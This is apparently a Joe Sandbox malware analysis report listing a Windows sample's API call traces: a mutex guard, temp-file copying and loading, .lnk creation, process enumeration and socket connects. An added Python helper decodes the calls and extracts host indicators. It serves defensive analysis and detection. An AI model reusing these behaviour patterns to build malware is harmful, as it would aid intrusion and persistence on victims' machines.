                                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000004), ref: 01285B2D
                                                                                                                                                                                                                                    • RegCloseKey.KERNEL32(00000000), ref: 01285BFB
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
• Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: wsprintf$CloseQueryValue
• String ID:
• API String ID: 2158237808-0
• Opcode ID: e54fdc0021a9e18b2a5f3699416ea66b5f1ddda9053053e5cd270d50072c8ac7
• Instruction ID: e812403f0793931f0ceb63a40f46294edf18f90cbd92d6b276683a1b83f84f34
• Opcode Fuzzy Hash: e54fdc0021a9e18b2a5f3699416ea66b5f1ddda9053053e5cd270d50072c8ac7
• Instruction Fuzzy Hash: 47F0E730A12119DBCB24EF88E9C87A9F7B5AF48319F1481D9D909A7291D7749A80CF44
Strings
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: CountExchangeInterlockedTick
• String ID: x$z${
• API String ID: 3499635708-1334427886
• Opcode ID: f81402154c637fa41e8b7436ecc3f13e409c610f9ad9dbd77e871829a4956cda
• Instruction ID: 0199514c42e8c992311bc353a7ad5aec69b438852a326937e91032d2243b69fe
• Opcode Fuzzy Hash: f81402154c637fa41e8b7436ecc3f13e409c610f9ad9dbd77e871829a4956cda
• Instruction Fuzzy Hash: 28624DB1D2210ADFDF14EF98C981AAE77B1FF98304F24821DE515A7380D734AA55CBA1
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d9aff8e00a7f71b2b17fef87b6229ed2804c3dd8e6d7691759069b8ba1df6b48
• Instruction ID: 30dcd82b95610d0de59494901b1336f35deac4b1cd4147000e6a72575b19cf96
• Opcode Fuzzy Hash: d9aff8e00a7f71b2b17fef87b6229ed2804c3dd8e6d7691759069b8ba1df6b48
• Instruction Fuzzy Hash: 17711970E1414A8BDF09CF6DC5507BEBBF2AF89304F18C069DA56AB341D6359A42CB90
APIs
• LoadLibraryExA.KERNELBASE(KERNEL32.DLL,00000000,00000000), ref: 0130D831
• SetErrorMode.KERNEL32(00008002), ref: 0130D858
• CreateFileMappingA.KERNEL32(-00000001,00000000,00000004,00000000,00008000,hh8geqpHJTkdns6), ref: 0130D872
• CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00015400,purity_control_7728), ref: 0130D88C
• MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00015400), ref: 0130D8A2
• GetModuleFileNameA.KERNEL32(00000000,0130EED8,000001FE), ref: 0130D935
• LoadLibraryExA.KERNELBASE(SHELL32.DLL,00000000,00000000), ref: 0130D954
• GetProcAddress.KERNELBASE(00000000,ShellExecuteA), ref: 0130D962
• CreateMutexA.KERNEL32(00000000,00000000,Ap1mutx7), ref: 0130D98F
• GetLastError.KERNEL32(00000000), ref: 0130D996
• Sleep.KERNEL32(000927C0), ref: 0130D9A5
• ExitProcess.KERNEL32(00000000), ref: 0130D9AD
Strings
Memory Dump Source
• Source File: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: File$Create$ErrorLibraryLoadMapping$AddressExitLastModeModuleMutexNameProcProcessSleepView
• String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728
• API String ID: 3566498206-162185446
• Opcode ID: 4dfdd8c8ea759f40701b5fec77ac64174a416b025a1b0df71bc92e610429bfa5
• Instruction ID: 4a0fc2bf3bff6c3bacb2b009b8b18fd6ed66cf12347dd77fd76653d736addf8d
• Opcode Fuzzy Hash: 4dfdd8c8ea759f40701b5fec77ac64174a416b025a1b0df71bc92e610429bfa5
• Instruction Fuzzy Hash: 9B618E31640289ABEF11DFE4CC59FEA3BE9EF04B09F040415EE0DBE1E0D6B166448B5A
APIs
• GetSystemDirectoryA.KERNEL32(00000000,000000F8), ref: 0128976E
• lstrlen.KERNEL32(00000000), ref: 0128977B
• lstrcat.KERNEL32(00000000,01283C94), ref: 0128979A
• GlobalAlloc.KERNEL32(00000040,?), ref: 012897CD
• lstrcat.KERNEL32(00000000,?), ref: 0128983B
  • Part of subcall function 0128A75A: GetTempPathA.KERNEL32(00000080,00000000,?), ref: 0128A78C
  • Part of subcall function 0128A75A: lstrlen.KERNEL32(00000000), ref: 0128A796
  • Part of subcall function 0128A75A: lstrcat.KERNEL32(00000000,01283CC0), ref: 0128A7B2
  • Part of subcall function 0128A75A: lstrcpy.KERNEL32(00000000,00000000), ref: 0128A7CF
  • Part of subcall function 0128A75A: lstrlen.KERNEL32(00000000,01282880,00000000), ref: 0128A7FD
  • Part of subcall function 0128A75A: wsprintfA.USER32 ref: 0128A809
• CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 01289860
• LoadLibraryExA.KERNEL32(00000000,00000000,00000001), ref: 01289875
• LoadLibraryExA.KERNEL32(?,00000000,00000001), ref: 01289895
• GlobalFree.KERNEL32(?), ref: 012898B8
• GetProcAddress.KERNEL32(00000000,01282294), ref: 012898CB
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: lstrcatlstrlen$GlobalLibraryLoad$AddressAllocCopyDirectoryFileFreePathProcSystemTemplstrcpywsprintf
• String ID:
• API String ID: 1023114332-0
• Opcode ID: 32930c000e7ca76ee1ba9aebf4f7df04fc63c5ebe3dae262f59b6f56cceff8b1
• Instruction ID: 3be53ba29610506d9acaeb8558d29d8bcb297f64ef0367374692f462c9128867
• Opcode Fuzzy Hash: 32930c000e7ca76ee1ba9aebf4f7df04fc63c5ebe3dae262f59b6f56cceff8b1
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 18B11B74A11219EFDF24EF64DC89BEDB7B5EB88304F1085D8E609A7294D774AA80CF50
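The three routines in this part of the listing that carry API call lists (the initialisation routine starting at 0130D831, the copy-to-temp-and-load routine starting at 0128976E, and the Winsock routine starting at 01287C83 that follows) read much more easily once the raw hexadecimal arguments are decoded and the named objects are pulled out. The Python below is an added example, not part of the Joe Sandbox report or its tooling. It assumes only the `API.MODULE(arg,...), ref: ADDR` line shape the listing shows (with the optional `Part of subcall function ADDR:` prefix); the sample input is copied from the listing, the constant tables are my own selection from the Windows SDK headers, and the single-instance-guard check is a heuristic on call order (CreateMutexA, then GetLastError, then ExitProcess), not a conclusion the report itself states.

```python
# Added example (not part of the Joe Sandbox report or its tooling): parse the
# listing's "APIs" lines, decode common Win32/Winsock constants and pull out the
# named kernel objects. Only the "API.MODULE(args), ref: ADDR" shape is assumed.
import re
from collections import namedtuple

# Constructed test input: lines copied verbatim from this report's listing.
REPORT_LINES = """
• SetErrorMode.KERNEL32(00008002), ref: 0130D858
• CreateFileMappingA.KERNEL32(-00000001,00000000,00000004,00000000,00008000,hh8geqpHJTkdns6), ref: 0130D872
• CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00015400,purity_control_7728), ref: 0130D88C
• MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00015400), ref: 0130D8A2
• CreateMutexA.KERNEL32(00000000,00000000,Ap1mutx7), ref: 0130D98F
• GetLastError.KERNEL32(00000000), ref: 0130D996
• Sleep.KERNEL32(000927C0), ref: 0130D9A5
• ExitProcess.KERNEL32(00000000), ref: 0130D9AD
• GlobalAlloc.KERNEL32(00000040,?), ref: 012897CD
  • Part of subcall function 0128A75A: wsprintfA.USER32 ref: 0128A809
• socket.WS2_32(00000002,00000001,00000006), ref: 01287C83
• ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 01287CD8
• Sleep.KERNEL32(00000032), ref: 01287D1F
"""

LINE_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$")
HEX_ARG_RE = re.compile(r"^-?[0-9A-F]{8}$")

# Values from the Windows SDK headers (my selection), keyed by (API, argument index).
FLAGS = {
    ("SetErrorMode", 0): {0x1: "SEM_FAILCRITICALERRORS", 0x2: "SEM_NOGPFAULTERRORBOX",
                          0x4: "SEM_NOALIGNMENTFAULTEXCEPT", 0x8000: "SEM_NOOPENFILEERRORBOX"},
    ("GlobalAlloc", 0): {0x2: "GMEM_MOVEABLE", 0x40: "GMEM_ZEROINIT"},
    ("CreateFileMappingA", 2): {0x2: "PAGE_READONLY", 0x4: "PAGE_READWRITE", 0x40: "PAGE_EXECUTE_READWRITE"},
    ("MapViewOfFile", 1): {0x2: "FILE_MAP_WRITE", 0x4: "FILE_MAP_READ"},
}
ENUMS = {("socket", 0): {2: "AF_INET"}, ("socket", 1): {1: "SOCK_STREAM"},
         ("socket", 2): {6: "IPPROTO_TCP"}, ("ioctlsocket", 1): {0x8004667E: "FIONBIO"}}
# Argument index that carries the object name in the named-object creators.
NAMED_OBJECT_ARG = {"CreateMutexA": 2, "CreateFileMappingA": 5, "CreateEventA": 3, "CreateSemaphoreA": 3}

ApiCall = namedtuple("ApiCall", "api module args ref subcall")


def parse_arg(raw):
    raw = raw.strip()
    if raw == "?":                      # value the sandbox could not resolve
        return None
    return int(raw, 16) if HEX_ARG_RE.match(raw) else raw   # "-00000001" -> -1


def parse_api_lines(text):
    calls = []
    for m in filter(None, map(LINE_RE.match, text.splitlines())):  # headers do not match
        raw = m.group("args")
        args = [parse_arg(a) for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16), m.group("sub")))
    return calls


def decode_flags(value, table):
    names = [name for bit, name in sorted(table.items()) if value & bit]
    rest = value & ~sum(bit for bit in table if value & bit)   # bits the table does not know
    return "|".join(names + ([hex(rest)] if rest else [])) or "0"


def decode_args(call):
    out = []
    for i, a in enumerate(call.args):
        key = (call.api, i)
        if a is None or isinstance(a, str):
            out.append("?" if a is None else repr(a))
        elif key in FLAGS:
            out.append(decode_flags(a, FLAGS[key]))
        elif key in ENUMS:
            out.append(ENUMS[key].get(a, hex(a)))
        elif call.api == "Sleep" and i == 0:
            out.append(f"{a} ms ({a / 1000:g} s)")
        else:                           # -1 as a file handle: pagefile-backed section
            out.append("INVALID_HANDLE_VALUE" if a == -1 else hex(a))
    return out


def named_objects(calls):
    """Named mutexes/sections as (API, name): host-based indicators for this sample."""
    found = {(c.api, c.args[i]) for c in calls for i in [NAMED_OBJECT_ARG.get(c.api)]
             if i is not None and i < len(c.args) and isinstance(c.args[i], str)}
    return sorted(found)


def find_mutex_guard(calls):
    """Heuristic on call order only: CreateMutexA, then GetLastError, then ExitProcess
    is the usual 'already running, bail out' single-instance guard. Returns the name."""
    name, saw_error = None, False
    for c in calls:
        if c.api == "CreateMutexA" and len(c.args) > 2 and isinstance(c.args[2], str):
            name, saw_error = c.args[2], False
        elif name and c.api == "GetLastError":
            saw_error = True
        elif name and saw_error and c.api == "ExitProcess":
            return name
    return None
```

Import the module (or paste it into a REPL) and feed any pasted "APIs" block to `parse_api_lines`. On the lines above, `named_objects` returns the three names worth putting on a watch list as (API, name) pairs (`hh8geqpHJTkdns6` and `purity_control_7728` for the sections, `Ap1mutx7` for the mutex), `find_mutex_guard` returns `Ap1mutx7`, and `decode_args` turns `SetErrorMode(00008002)` into `SEM_NOGPFAULTERRORBOX|SEM_NOOPENFILEERRORBOX` (no crash dialogs), the `8004667E` passed to `ioctlsocket` into `FIONBIO` (non-blocking connect), and `Sleep(000927C0)` into `600000 ms`, which is what makes the ten-minute sleep ahead of `ExitProcess` obvious at a glance. The unresolved `?` arguments are kept as `?` rather than guessed.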
APIs
• socket.WS2_32(00000002,00000001,00000006), ref: 01287C83
• ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 01287CD8
• connect.WS2_32(000000FF,00000002,00000010), ref: 01287CEB
• WSAGetLastError.WS2_32 ref: 01287D05
• Sleep.KERNEL32(00000032), ref: 01287D1F
• select.WS2_32(000000FE,00000000,00000000,00000000,00000000), ref: 01287E79
• ioctlsocket.WS2_32(000000FF,8004667E,00000000), ref: 01287EE6
• closesocket.WS2_32(000000FF), ref: 01287EFB
Strings
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ioctlsocket$ErrorLastSleepclosesocketconnectselectsocket
                                                                                                                                                                                                                                    • String ID: 3'$@$@
                                                                                                                                                                                                                                    • API String ID: 3016611618-2553492011
                                                                                                                                                                                                                                    • Opcode ID: a214526164c9eb187272b42a89a961ffbd9bcf805364577421791dc4ab0c58c7
                                                                                                                                                                                                                                    • Instruction ID: 32e96b40ecc052eb8449f1a5aa45c35a4ab621f3433e3d7c29f0385d0584f59f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a214526164c9eb187272b42a89a961ffbd9bcf805364577421791dc4ab0c58c7
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF715675925229CBDB34EF14DC88BE9B371BB64304F2086D9D18AA62C0D7B46EC0CF50
APIs
• lstrcpy.KERNEL32(?,?), ref: 01290EF4
• lstrlen.KERNEL32(?), ref: 01290F21
• lstrcat.KERNEL32(?,.lnk), ref: 01290F43
• lstrcat.KERNEL32(?), ref: 01290F70
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 01290F8C
• CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000020,00000000), ref: 01290FA8
• lstrlenW.KERNEL32(?), ref: 01290FC8
• lstrlenW.KERNEL32(?), ref: 01290FFB
• WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0129103B
• CloseHandle.KERNEL32(?), ref: 01291048
  • Part of subcall function 012844CB: InterlockedExchange.KERNEL32(012990C0,0128A192), ref: 012844E9
Strings
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: lstrlen$Filelstrcat$ByteCharCloseCreateExchangeHandleInterlockedMultiWideWritelstrcpy
• String ID: .lnk
• API String ID: 2963584520-24824748
• Opcode ID: 4827352efc19597bde00025d8f9bf19421523452960e1c8a8f8cf443bbe38a0d
• Instruction ID: 6a4861b42f2391d7e6bd96ca99e976c386bc1756c511699811e90b451b019f0b
• Opcode Fuzzy Hash: 4827352efc19597bde00025d8f9bf19421523452960e1c8a8f8cf443bbe38a0d
• Instruction Fuzzy Hash: ED41A5B691021DABDB21DB58DC49BEA77B9FB48701F04C5E8F309A61D0DB746B888F50
APIs
• GetModuleFileNameA.KERNEL32(00000000,0130EED8,000001FE), ref: 0130D935
• LoadLibraryExA.KERNELBASE(SHELL32.DLL,00000000,00000000), ref: 0130D954
• GetProcAddress.KERNELBASE(00000000,ShellExecuteA), ref: 0130D962
• CreateMutexA.KERNEL32(00000000,00000000,Ap1mutx7), ref: 0130D98F
• GetLastError.KERNEL32(00000000), ref: 0130D996
• Sleep.KERNEL32(000927C0), ref: 0130D9A5
• ExitProcess.KERNEL32(00000000), ref: 0130D9AD
Strings
Memory Dump Source
• Source File: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: AddressCreateErrorExitFileLastLibraryLoadModuleMutexNameProcProcessSleep
• String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$open
• API String ID: 1721171764-1163154406
• Opcode ID: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
• Instruction ID: 00e817fd631518231616da5d089cda40b8a064a9adf508037919a9174385179b
• Opcode Fuzzy Hash: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
• Instruction Fuzzy Hash: 6011DB71244289ABEF51DEE48D1DFED37E9AB84B05F440415FA09EE0E0DAB19204876B
APIs
• GetModuleFileNameA.KERNEL32(00000000,05B31778,000001FE), ref: 05B301D5
• LoadLibraryExA.KERNEL32(SHELL32.DLL,00000000,00000000), ref: 05B301F4
• GetProcAddress.KERNEL32(00000000,ShellExecuteA), ref: 05B30202
• CreateMutexA.KERNEL32(00000000,00000000,Ap1mutx7), ref: 05B3022F
• GetLastError.KERNEL32(00000000), ref: 05B30236
• Sleep.KERNEL32(000927C0), ref: 05B30245
• ExitProcess.KERNEL32(00000000), ref: 05B3024D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2249113471.0000000005B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5b30000_PfBjDhHzvV.jbxd
Similarity
• API ID: AddressCreateErrorExitFileLastLibraryLoadModuleMutexNameProcProcessSleep
• String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$open
• API String ID: 1721171764-1163154406
• Opcode ID: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
• Instruction ID: 8bc290a5b4cbb6164913b35893ec34d1d830a75f3d1492a722f8822534afd078
• Opcode Fuzzy Hash: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
• Instruction Fuzzy Hash: 9011D271284289ABEF51EEA08D4EFE93759EF44B05F444415BA09FD0D0DAB1A244876B
APIs
• CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000020,00000000), ref: 01290D32
• GetFileSize.KERNEL32(?,00000000), ref: 01290D4B
• GlobalAlloc.KERNEL32(00000040,?), ref: 01290D6D
• ReadFile.KERNEL32(?,?,?,?,00000000), ref: 01290D88
• CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000020,00000000), ref: 01290DCC
• GetFileSize.KERNEL32(?,00000000), ref: 01290DE1
• GlobalAlloc.KERNEL32(00000040,?), ref: 01290DFF
• ReadFile.KERNEL32(?,?,?,?,00000000), ref: 01290E1A
• GlobalFree.KERNEL32(?), ref: 01290E46
• CloseHandle.KERNEL32(?), ref: 01290E50
• GlobalFree.KERNEL32(?), ref: 01290E5A
• CloseHandle.KERNEL32(?), ref: 01290E64
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$Global$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 675253578-0
                                                                                                                                                                                                                                    • Opcode ID: c02ccb74ec99ef5aa97c78a9a48201ecb6a154dafa7c4b9415aa7d785691dac7
                                                                                                                                                                                                                                    • Instruction ID: ffa130ee334d256cfcaf0bf4b115a6b7daa97554abe6bf282f8782e206650e4b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c02ccb74ec99ef5aa97c78a9a48201ecb6a154dafa7c4b9415aa7d785691dac7
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 68410A75E10209FBEB20DFE4D849FAEBB79AB48701F108548F615A72C4D7B46A508B94
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 01289C94
                                                                                                                                                                                                                                    • Process32First.KERNEL32(00000000,00000128), ref: 01289CDD
                                                                                                                                                                                                                                    • CharUpperA.USER32(?,00000002,00000000), ref: 01289CF1
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000400), ref: 01289D67
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000400), ref: 01289DB2
                                                                                                                                                                                                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 01289DC6
                                                                                                                                                                                                                                    • CharUpperA.USER32(?,00000002,00000000), ref: 01289DDA
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000400), ref: 01289E25
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000400), ref: 01289E9D
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000002,00000000), ref: 01289EB3
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Sleep$CharProcess32Upper$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3272108884-0
                                                                                                                                                                                                                                    • Opcode ID: 36716044aadfb34d9312ca360a788a0c0091e2ec45330869a18ece28ad5bfe93
                                                                                                                                                                                                                                    • Instruction ID: 565c9d3827d31923f2fd14e3c874943276cab8e3e3dc9d02c7b6d1965596ec95
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 36716044aadfb34d9312ca360a788a0c0091e2ec45330869a18ece28ad5bfe93
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E519CB19121198BEF24FB24DC49BFAB7B4AB95308F0481D9D609A7280D775ABD0CF91
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 012844CB: InterlockedExchange.KERNEL32(012990C0,0128A192), ref: 012844E9
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,01282490), ref: 01292C53
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 01292D24
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,01283DFC), ref: 01292D86
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,01283E00), ref: 01292D98
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,01283E04), ref: 01292DC1
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000,%s,01293658,?,?,?,?,?,?), ref: 01292DD7
                                                                                                                                                                                                                                      • Part of subcall function 01292A35: lstrlen.KERNEL32(00000000), ref: 01292A4E
                                                                                                                                                                                                                                      • Part of subcall function 01292A35: lstrcat.KERNEL32(00000000,01283DE0), ref: 01292A7C
                                                                                                                                                                                                                                      • Part of subcall function 01292A35: lstrcat.KERNEL32(00000000,01283DE4), ref: 01292AA2
                                                                                                                                                                                                                                      • Part of subcall function 01292A35: lstrcat.KERNEL32(00000000,01283DE8), ref: 01292AB1
                                                                                                                                                                                                                                      • Part of subcall function 01292A35: lstrlen.KERNEL32(00000000), ref: 01292B0C
                                                                                                                                                                                                                                      • Part of subcall function 01292A35: lstrcat.KERNEL32(00000000,01283DEC), ref: 01292B40
                                                                                                                                                                                                                                      • Part of subcall function 01292A35: lstrcat.KERNEL32(00000000,01283DF0), ref: 01292B66
